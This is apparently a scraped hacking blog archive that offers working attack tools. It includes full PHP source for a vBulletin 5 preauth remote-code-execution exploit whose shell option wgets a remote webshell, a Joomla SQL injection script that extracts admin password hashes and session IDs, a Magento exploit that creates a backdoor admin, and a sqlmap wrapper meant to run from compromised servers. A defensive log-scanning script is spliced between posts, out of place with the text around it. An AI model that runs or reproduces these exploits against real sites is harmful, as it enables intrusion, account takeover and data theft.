<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixroMefJawTeW2uglwwvzdOqFWEqnr-ItAxCFldydsTk8AlvVkwDMiapcP-44ydD2e-jVikpalOA4MGE3hhlZHGxFj-3LkEWxZAz1M5QykE5LE4i4GwEd6hQf7l6z0nOJoCGnuO_sJuCY/s1600/6.1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixroMefJawTeW2uglwwvzdOqFWEqnr-ItAxCFldydsTk8AlvVkwDMiapcP-44ydD2e-jVikpalOA4MGE3hhlZHGxFj-3LkEWxZAz1M5QykE5LE4i4GwEd6hQf7l6z0nOJoCGnuO_sJuCY/s1600/6.1.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><span style="background-color: black;"><span style="color: white;">d) Inject target using file.</span></span></b></div>
<div style="text-align: justify;">
In this module you can use the generated file to inject your target. Simply type the filename in the text box, set level, risk and technique (if you wish to) and go for "Exploit".</div>
<div style="text-align: justify;">
Refer to the following screenshots:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I am using the 'sqli-audi lab' again to demonstrate the usage of SQL_Inject0r_v2, as I used it for the previous Inject0r. From 'Step 2' onwards the exploitation process will be the same for all three modules.</div>
<div style="text-align: justify;">
Full demonstration of the "inject using file" module: </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="background-color: black;"><b>Step 1: </b></span>Provide the DB filename in the text box and click on the "Exploit" button.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAp6dfZa7X4oF2EsUVqdHQIkH1g3h8vO4T_Tc4JRR6HwFLuDVgbkDKTegdNZdSvDjDkLmSqnYMXPTIbL96IQHeCX7T7VBzsNpTCjX0iuWl6yUDhgU2T_po0MFPXZcrnqKA-LUSKXvDhmk/s1600/7injectfile.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAp6dfZa7X4oF2EsUVqdHQIkH1g3h8vO4T_Tc4JRR6HwFLuDVgbkDKTegdNZdSvDjDkLmSqnYMXPTIbL96IQHeCX7T7VBzsNpTCjX0iuWl6yUDhgU2T_po0MFPXZcrnqKA-LUSKXvDhmk/s1600/7injectfile.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Step 2:</b> You will get the names of all the existing databases. Select the database name you wish and proceed to extract the table names from the selected database. Refer to the screenshot: </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-gBPALW7evbFvwNTLNJnAESIQ6JbkgUAhazuGWF88A4eTJkWzEN7VnkMAr-MOoj87KmdVDiUGAfRQCPxmTg_8CbJPxsT0PAhxWlHeN2q2af2wUUwUuKp9hzQ8w3mAVsHHXIceVuquIrA/s1600/7.1injectfile.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-gBPALW7evbFvwNTLNJnAESIQ6JbkgUAhazuGWF88A4eTJkWzEN7VnkMAr-MOoj87KmdVDiUGAfRQCPxmTg_8CbJPxsT0PAhxWlHeN2q2af2wUUwUuKp9hzQ8w3mAVsHHXIceVuquIrA/s1600/7.1injectfile.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br />
<b>Step 3:</b>
You will get all the tables present in the selected database. Type the name of the table whose data you want into the input box and click on the "Extract Columns" button. Refer to the screenshot below: </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDb7i74R_Q6hK3aMFbUDlaUU2rKr3M0-osbKvhJsD1eP9-X7Oc2zPan7QW81EfYoM5ErsjM7zBz5jcb6vXcvuJgdfjZbWdO724wTwxuI6jD9uDIgdLk9fzW6oOdvzOccPDDsb7MbmIliI/s1600/tables.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDb7i74R_Q6hK3aMFbUDlaUU2rKr3M0-osbKvhJsD1eP9-X7Oc2zPan7QW81EfYoM5ErsjM7zBz5jcb6vXcvuJgdfjZbWdO724wTwxuI6jD9uDIgdLk9fzW6oOdvzOccPDDsb7MbmIliI/s1600/tables.png" /></a></div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Step 4:</b>
After getting the column names, you can proceed to dump the data from the columns. Type the column names, separated by commas (,), to get the data inside those columns and click on "Dump_Data".</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9hbEgJ2M50Niujz0gGyCWSolhOKLP3VnDHmJ1OmTs2jWyYc68oJlquP0wp72lMYdKXG4iS_OF_84PUBQKBR_5QuiPCTWUx2flik9gqf5uvLB6spTkHFUxQ4iUVEAEh8WlvcvZHEZO-kk/s1600/colunms.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9hbEgJ2M50Niujz0gGyCWSolhOKLP3VnDHmJ1OmTs2jWyYc68oJlquP0wp72lMYdKXG4iS_OF_84PUBQKBR_5QuiPCTWUx2flik9gqf5uvLB6spTkHFUxQ4iUVEAEh8WlvcvZHEZO-kk/s1600/colunms.png" /></a></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<b>Step 5:</b> Finally, you will get the data inside the columns.</div>
<div style="text-align: justify;">
Reference image:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXQrTfDSnYhz00Jb7FyS9HfDfkx8IvAisdN7-P44lzm2lwh9BUnIO6zhYzCi4ZeYnsly_PYho8y3iM1zEsMW85meBcLlWBsV2dY9VS7mWD8GEc96XBfQ-iIrB-uf9lRF_wbiiGDStSyk8/s1600/data.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXQrTfDSnYhz00Jb7FyS9HfDfkx8IvAisdN7-P44lzm2lwh9BUnIO6zhYzCi4ZeYnsly_PYho8y3iM1zEsMW85meBcLlWBsV2dY9VS7mWD8GEc96XBfQ-iIrB-uf9lRF_wbiiGDStSyk8/s1600/data.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
So this is SQL_Inject0r_v2, with some more functionality.</div>
<div style="text-align: justify;">
I hope this description will help you to use the script. :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thank you.</div>
</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-48822616129977981882015-11-17T11:57:00.000+05:302015-11-17T11:57:09.173+05:30VB 5 preauth RCE (Remote code execution) exploit<div dir="ltr" style="text-align: left;" trbidi="on">
Pranaam to all _/\_<br />
<br />
This script exploits the preauth RCE vulnerability in vBulletin 5 (PoC published by Cutz).<br /><br />The script was developed by someone else.<br />
<br />
Just type the target forum link and, in the command box, type whatever command you want to execute.<br />
The syntax is system('your_command');<br />
For example, for ls<br />
type system('ls');<br />
If you want to execute the whoami command, type system('whoami');<br />
<br />Enjoy<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg749CYNNC-mcGR1vX9_mmDMWzgQtiKu9YYCtu2nWnbRXgQvJ56aqGJ_CM9FYrbKpsq6uur1zeBC9mMVHOQ3khy0c-JkhcBSlt0qrvmh-xM9PUzuwPRUhn-HRlV8AjMwAFUryrKEWIBUxo/s1600/vb+exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg749CYNNC-mcGR1vX9_mmDMWzgQtiKu9YYCtu2nWnbRXgQvJ56aqGJ_CM9FYrbKpsq6uur1zeBC9mMVHOQ3khy0c-JkhcBSlt0qrvmh-xM9PUzuwPRUhn-HRlV8AjMwAFUryrKEWIBUxo/s1600/vb+exploit.png" /></a></div>
<br />
The source code is:<br />
//////////code starts<br />
<br />
<?php<br />
<br />
/*<br />
Greetxx to Gujjar pcp :: Rummy khan :: ConnectingFriend :: Haxorious Mind :: Exploiter-z :: Ch3rn0by1 :: zen :: zeshi :: Makman<br />
*/<br />
if (isset($_POST['target'])) {<br />
$host = $_POST['target'];<br />
$path = '/ajax/api/hook/decodeArguments?arguments='; <br />
class vB_Database {<br />
public $functions = array();<br />
<br />
public function __construct()<br />
{<br />
$this->functions['free_result'] = 'assert';<br />
}<br />
}<br />
class vB_dB_Result {<br />
protected $db;<br />
protected $recordset;<br />
<br />
public function __construct()<br />
{<br />
if(isset($_POST['command'])) {<br />
$command = $_POST['command'];<br />
} else if (isset($_POST['shell'])) {<br />
$command = 'system(wget http://b374k.webshell-archive.org/b374k.txt)';<br />
} else {<br />
echo 'Choose One Option';<br />
}<br />
//echo $command."<br>";<br />
$this->db = new vB_Database();<br />
$this->recordset = $command;<br />
}<br />
}<br />
$payload = urlencode(serialize(new vB_dB_Result()));<br />
echo $url = $host.$path.$payload;<br />
$curl = curl_init();<br />
curl_setopt ($curl, CURLOPT_URL, $url);<br />
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);<br />
$result = curl_exec ($curl);<br />
curl_close ($curl);<br />
print $result;<br />
} else {<br />
echo '<body bgcolor="black"><br />
<div align="center"><br />
<form action="" method="POST"><br />
<font color="green"><br />
<h1>VBulletin 5.x.x PreAuth Remote Code Execution Exploit</h1><br />
Enter Your Hostname example(http://www.vulnerablesite.com/vbulletin/)<br><br><br />
<input type=text name=target value="target.com"><br><brs><br />
<h2>Execute A Command</h2><br />
<br />
Enter Your command <input type="text" name="command"><br />
<br />
<br />
<input type="submit"><br />
<h2>Drop A Shell</h2><br />
<input type="submit" value="Shell" name="shell"><br />
</font><br />
</form><br />
</div><br />
</body>';<br />
}<br />
?><br />
<br />
<br />
//////code ends here </div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-8936059797795415212015-10-28T11:38:00.000+05:302015-11-17T12:18:52.964+05:30Joomla SQL Injection exploiter (Version 3.2.* to 3.4.4)<div dir="ltr" style="text-align: left;" trbidi="on">
Pranaam to all bhai ji _/\_<br />
Today I am going to share a simple PHP script which exploits the SQL injection vulnerability in Joomla versions 3.2.* to 3.4.4.<br />
<br />
Just upload this script on your localhost (it must have PHP curl enabled).<br />
Specify the target name and run it.<br />
If the target is vulnerable, the script will extract the admin username, password hash and also the admin session id (if a super admin is logged in).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Ix7zDmnR66OQxySnvxqQ1gsF4HP7sTXOnzqfVZ2iJ3w0nean0LzSd1BrlyBg-iuQL1Dldlb4QG9TNzULaYtrdjk7PUHAcHON5GRXGwHl6chJueokMBP3GRHSNAV6RMd_ple-SlqgGIo/s1600/joomla.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Ix7zDmnR66OQxySnvxqQ1gsF4HP7sTXOnzqfVZ2iJ3w0nean0LzSd1BrlyBg-iuQL1Dldlb4QG9TNzULaYtrdjk7PUHAcHON5GRXGwHl6chJueokMBP3GRHSNAV6RMd_ple-SlqgGIo/s1600/joomla.png" /></a></div>
<br />
The code is given below:<br />
///////////////////////////////// code starts here<br />
<br />
<?php <br />
session_start();<br />
error_reporting(0);<br />
set_time_limit(0);<br />
/* Coded By Manish At Indishell Lab*/<br />
$head = '<br />
<html><br />
<head><br />
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/><br />
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title><br />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><br />
<br />
<STYLE><br />
body {<br />
font-family: Tahoma;<br />
color: white;<br />
background: #444444;<br />
}<br />
<br />
input {<br />
border : solid 2px ;<br />
border-color : black;<br />
BACKGROUND-COLOR: #444444;<br />
font: 8pt Verdana;<br />
<br />
color: white;<br />
}<br />
<br />
submit {<br />
BORDER: buttonhighlight 2px outset;<br />
BACKGROUND-COLOR: Black;<br />
width: 30%;<br />
color: #FFF;<br />
}<br />
<br />
#t input[type=\'submit\']{<br />
COLOR: White;<br />
border:none;<br />
BACKGROUND-COLOR: black;<br />
}<br />
<br />
#t input[type=\'submit\']:hover {<br />
<br />
BACKGROUND-COLOR: #ff9933;<br />
color: black;<br />
<br />
}<br />
tr {<br />
BORDER: dashed 1px #333;<br />
color: #FFF;<br />
}<br />
td {<br />
BORDER: dashed 0px ;<br />
}<br />
.table1 {<br />
BORDER: 0px Black;<br />
BACKGROUND-COLOR: Black;<br />
color: #FFF;<br />
}<br />
.td1 {<br />
BORDER: 0px;<br />
BORDER-COLOR: #333333;<br />
font: 7pt Verdana;<br />
color: Green;<br />
}<br />
.tr1 {<br />
BORDER: 0px;<br />
BORDER-COLOR: #333333;<br />
color: #FFF;<br />
}<br />
table {<br />
BORDER: dashed 2px #333;<br />
BORDER-COLOR: #333333;<br />
BACKGROUND-COLOR: #191919;<br />
color: #FFF;<br />
}<br />
textarea {<br />
border : dashed 2px #333;<br />
BACKGROUND-COLOR: Black;<br />
font: Fixedsys bold;<br />
color: #999;<br />
}<br />
A:link {<br />
border: 1px;<br />
COLOR: red; TEXT-DECORATION: none<br />
}<br />
A:visited {<br />
COLOR: red; TEXT-DECORATION: none<br />
}<br />
A:hover {<br />
color: White; TEXT-DECORATION: none<br />
}<br />
A:active {<br />
color: white; TEXT-DECORATION: none<br />
}<br />
</STYLE><br />
<script type="text/javascript"><br />
<!--<br />
function lhook(id) {<br />
var e = document.getElementById(id);<br />
if(e.style.display == \'block\')<br />
e.style.display = \'none\';<br />
else<br />
e.style.display = \'block\';<br />
}<br />
//--><br />
</script><br />
'; <br />
<br />
<br />
<br />
echo $head ;<br />
echo '<br />
<br />
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" ><br />
<br />
<br />
<br />
<td width="100%" align=center valign="top" rowspan="1"><br />
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr"> <br />
<br />
<td height="10" align="left" class="td1"></td></tr><tr><td <br />
width="100%" align="center" valign="top" rowspan="1"><font <br />
color="red" face="comic sans ms"size="1"><b> <br />
<font color=#ff9933> <br />
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white><br />
-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br><br />
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Gujjar PCP,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br><br />
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font><br />
<b> <br />
<font color=#ff9933> <br />
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br />
<br />
</table><br />
</table> <br><br />
<br />
';<br />
?><br />
<div align=center><br />
Special Thanks to MakMan (For SQL Injection Query)<br><br />
<form method=post><br />
<input type=input name=in value="http://falana-dhimka.com/"><br />
<input type=submit name=sm value="Start Exploitation"><br />
<br />
<?php<br />
function data($lu)<br />
{<br />
$ch = curl_init();<br />
<br />
curl_setopt($ch, CURLOPT_URL, $lu);<br />
curl_setopt($ch, CURLOPT_HEADER, 0);<br />
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br />
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);<br />
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');<br />
$result['EXE'] = curl_exec($ch);<br />
curl_close($ch);<br />
return $result['EXE'];<br />
<br />
<br />
}<br />
<br />
<br />
<br />
<br />
if(isset($_POST['sm']))<br />
{<br />
$firstq="(/*!32100select*/+1+/*!32100from*/+(/*!32100select*/+/*!32100count(*)*/,+/*!32100conCat((/*!32100select*/+(/*!32100select*/+/*!32100conCat(0x7e7e,password,0x7e7e)*/)+/*!32100from*/+/*!32100icalab_users*/+/*!32100where*/+/*!32100name*/=0x53757065722055736572+LIMIT+0,1),floor(rand(0)*2))tu+/*!32100from*/+/*!32100information_schema*/.tables+/*!32100group*/+/*!32100by*/+tu)p)";<br />
$tar=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=".$firstq;<br />
<br />
$dat=data($tar); <br />
$ar0=explode("LEFT JOIN", $dat);<br />
$ar1=explode("_users", $ar0[1]);<br />
$ar=trim($ar1[0]);<br />
<br />
$mainq="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e7e,(/*!00000select*/concat_ws(0x7e7e,0x6963616c6162,username,password,email)+/*!00000from*/+icalab_users+order+by+id+ASC+limit+0,1),(/*!00000select*/concat_ws(0x7e,session_id,0x6963616c6162)+/*!00000from*/+icalab_session+order+by+time+DESC+limit+0,1))as+t)``)``))";<br />
<br />
$tarfinal=str_replace($firstq,$mainq,$tar);<br />
<br />
$rt=str_replace("icalab",$ar,$tarfinal);<br />
<br />
$tr=data($rt);<br />
$ar0=explode("icalab", $tr);<br />
$ar0[1];<br />
<br />
<br />
if($ar0[1]!='')<br />
{<br />
$all=array_filter(explode("~~",$ar0[1]));<br />
//print_r($all);die();<br />
<br />
echo "<br> Target gone 8-)<br><br>website name:- ".trim($_POST['in'])." <br>-------------------------------<br> <br>";<br />
echo "website super admin username is --> ".$all[1]." <br>Password Hash is --> ".$all[2]."<br>E-mail id -> ".$all[3];<br />
<br />
echo "<br>-------------------------------<br><br>Super Admin session ID is<br>";<br />
$sessionid=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=updatexml(1,/*!31221conCat(0x7e7e,(/*!23121select*/+session_id+/*!23121from*/+".$ar."_session+/*!32312where*/+/*!32312username*/='".$all[1]."'+limit+0,1),0x7e7e),0)";<br />
<br />
<br />
<br />
$ses=data($sessionid);<br />
$ar0=explode("~~", $ses);<br />
//print_r($ar0);<br />
echo trim($ar0[1]);<br />
<br />
echo "<br>Other user session ID is<br>";<br />
$sessionid=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=updatexml(1,/*!31221conCat(0x7e7e,(/*!23121select*/+session_id+/*!23121from*/+".$ar."_session+limit+0,1),0x7e7e),0)";<br />
<br />
$ses=data($sessionid);<br />
$ar0=explode("~~", $ses);<br />
//print_r($ar0);<br />
echo trim($ar0[1]);<br />
}<br />
}<br />
<br />
?><br />
<br />
<br />
/////////////////////////////// code ends here<br />
<br />
With Love from<br />
Team Indishell</div>
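A defender-side check for the two request shapes that appear in the vBulletin post above and in this Joomla post: the /ajax/api/hook/decodeArguments?arguments= call carrying a serialized PHP object, and the com_contenthistory request with SQL smuggled through list[select]=. This is an added example, not code from either post or from the Joomla or vBulletin projects; the access-log lines below are constructed in combined-log format with documentation IP addresses, and the label strings are my own naming.

```python
"""Access-log detector for the exploit request shapes described in the
vBulletin 5 and Joomla posts. Added example; log lines are constructed."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Markers that indicate SQL is being smuggled through list[select]:
# MySQL versioned comments (/*!...*/), error-based helpers, hex literals.
SQL_MARKERS = re.compile(
    r"/\*!\d*|\bselect\b|\bunion\b|updatexml\(|extractvalue\(|concat|0x[0-9a-f]{4,}",
    re.IGNORECASE,
)

# Apache/nginx combined log format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Constructed sample lines (not real traffic).
LOG_LINES = [
    '198.51.100.7 - - [28/Oct/2015:11:38:01 +0530] "GET /index.php?option=com_content'
    '&view=article&id=5 HTTP/1.1" 200 4311',
    '198.51.100.7 - - [28/Oct/2015:11:38:02 +0530] "GET /index.php?option=com_contenthistory'
    '&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(/*!32100select*/+1+'
    '/*!32100from*/+(/*!32100select*/+count(*),concat(0x7e7e,version(),0x7e7e,floor(rand(0)*2))tu+'
    '/*!32100from*/+information_schema.tables+group+by+tu)p) HTTP/1.1" 500 812',
    '203.0.113.9 - - [28/Oct/2015:11:38:03 +0530] "GET /index.php?option=com_contenthistory'
    '&view=history&list%5Bselect%5D=updatexml(1,concat(0x7e7e,user(),0x7e7e),0) HTTP/1.1" 500 790',
    '203.0.113.9 - - [17/Nov/2015:11:57:10 +0530] "GET /vbulletin/ajax/api/hook/decodeArguments'
    '?arguments=O%3A12%3A%22vB_dB_Result%22%3A0%3A%7B%7D HTTP/1.1" 200 115',
    '192.0.2.4 - - [17/Nov/2015:11:57:11 +0530] "GET /vbulletin/ajax/api/content_text/'
    'getIndexableContent?nodeid=10 HTTP/1.1" 200 655',
]


def classify_request(target: str):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %5B...%5D keys too
    path = parts.path.lower()

    # Joomla com_contenthistory: list[select] must never carry raw SQL.
    if qs.get("option", [""])[0] == "com_contenthistory":
        for value in qs.get("list[select]", []):
            if SQL_MARKERS.search(unquote_plus(value)):
                return "joomla-contenthistory-sqli"

    # vBulletin 5 decodeArguments: a serialized PHP *object* (O:<len>:"Class")
    # in `arguments` is the unserialize() shape used by the preauth RCE;
    # serialized arrays (a:...) are the endpoint's normal input and are ignored.
    if "/ajax/api/hook/decodearguments" in path:
        for value in qs.get("arguments", []):
            if re.match(r'^O:\d+:"', unquote_plus(value)):
                return "vbulletin-decodearguments-unserialize"
    return None


def scan_log(lines):
    """Return (ip, target, label) for every line matching a known exploit shape."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        label = classify_request(m.group("target"))
        if label:
            findings.append((m.group("ip"), m.group("target"), label))
    return findings


if __name__ == "__main__":
    for ip, target, label in scan_log(LOG_LINES):
        print(f"{label}\t{ip}\t{target[:80]}")
```

The same two checks translate directly into a WAF rule or a SIEM query on the request URI; the sample with a serialized array shows the vBulletin rule keys on the object prefix rather than on the endpoint alone.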
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-69202537393989106992015-08-25T22:24:00.000+05:302015-08-25T22:29:22.399+05:30Magento shoplift exploit python script (SUPEE-5344)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGmSp1lD9GtbQgYZff5Vq7MgeBunPc7bRDErvRYpgAzQs-F-7LlYz66oJ4njH6_4BIySVywA-zFipZTvS5Qix3boELN7bp9Cx9zODsIz0dM-aRZ1-iu0liexdDlPlPOfBEi36ycZVo0Ww/s1600/magento.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGmSp1lD9GtbQgYZff5Vq7MgeBunPc7bRDErvRYpgAzQs-F-7LlYz66oJ4njH6_4BIySVywA-zFipZTvS5Qix3boELN7bp9Cx9zODsIz0dM-aRZ1-iu0liexdDlPlPOfBEi36ycZVo0Ww/s1600/magento.png" /></a></div>
<div style="text-align: center;">
<br /></div>
Hello all,<br />
Here is the Magento shoplift exploit python script.<br />
It creates an admin account if the Magento installation is vulnerable.<br />
Just put the target website link at line number 7 (target = "http://target.com/").<br />
The admin credentials will be:<br />
username forme<br />
password forme<br />
<a href="https://github.com/incredibleindishell/Magento-shoplift-python-exploit/blob/master/shoplift.py">https://github.com/incredibleindishell/Magento-shoplift-python-exploit/blob/master/shoplift.py</a><br />
It was not developed by me; I just debugged it and made it work.<br />
<br />
<br />
<br />
--==[[ Greetz To ]]==--<br />
############################################################################################<br />
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,<br />
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,<br />
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,<br />
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash<br />
#############################################################################################<br />
--==[[Love to]]==--<br />
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,<br />
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)<br />
--==[[ Special Fuck goes to ]]==--<br />
<3 suriya Cyber Tyson <3</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com1tag:blogger.com,1999:blog-6893238704654067208.post-76846583178879820232015-08-17T01:33:00.001+05:302015-08-17T01:34:12.858+05:30SQL_Inj3cT0r by Incredible<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 style="text-align: left;">
<span style="font-size: large;">Description:</span></h3>
<div style="text-align: left;">
<br />
Basically, SQL_Injector is a PHP script integrated with ‘Sqlmap’ that uses the working functionality of ‘Sqlmap’.<br />
A worthy thing for those guys who use mobile phone internet. :P<br />
If you already have a hacked server, just upload the script on that server, and sqlmap will use the bandwidth of the website for exploitation :D, meaning you can use the bandwidth of the server in order to inject your target.</div>
<br />
You can download the script from here: https://github.com/incredibleindishell/Panda-sql-injector/blob/master/SQL-Injector%20v1.php<br />
<br />
NOTE: If the server has ‘safe_mode’ set to on, the script is not going to work. You need to set safe_mode to off; in order to do this you can try editing ‘php.ini’.<br />
<br />
<h3 style="text-align: left;">
How to use it?</h3>
<div style="text-align: left;">
Okay, using ‘SQL_Injector’ involves a few very simple steps, as follows:<br />
1. As mentioned above, ‘SQL_Injector’ is integrated with ‘Sqlmap’, so you need to provide the path or location of ‘Sqlmap’ on your system. If you don’t have ‘sqlmap’, no need to worry: ‘SQL_Injector’ has functionality to download ‘Sqlmap’. You can refer to the following snapshot:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicaMhjXzlnoUvRdZ6o4aVRHNvR5KVIY__tTzcET9pMM9jqOQR37B5pNA_5aNUwE5ZLURstTZ8IeoZvAfkXAZqaGeqRZ3GV0lL9VCj0yBruJIbFreg33m33zSFUYZxYG-mwxsx6_fqT2Mw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicaMhjXzlnoUvRdZ6o4aVRHNvR5KVIY__tTzcET9pMM9jqOQR37B5pNA_5aNUwE5ZLURstTZ8IeoZvAfkXAZqaGeqRZ3GV0lL9VCj0yBruJIbFreg33m33zSFUYZxYG-mwxsx6_fqT2Mw/s1600/1.png" /></a></div>
<div style="text-align: left;">
<br />
<br />
If you already have sqlmap, then set the location of the sqlmap.py script. You can refer to the snapshot: </div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
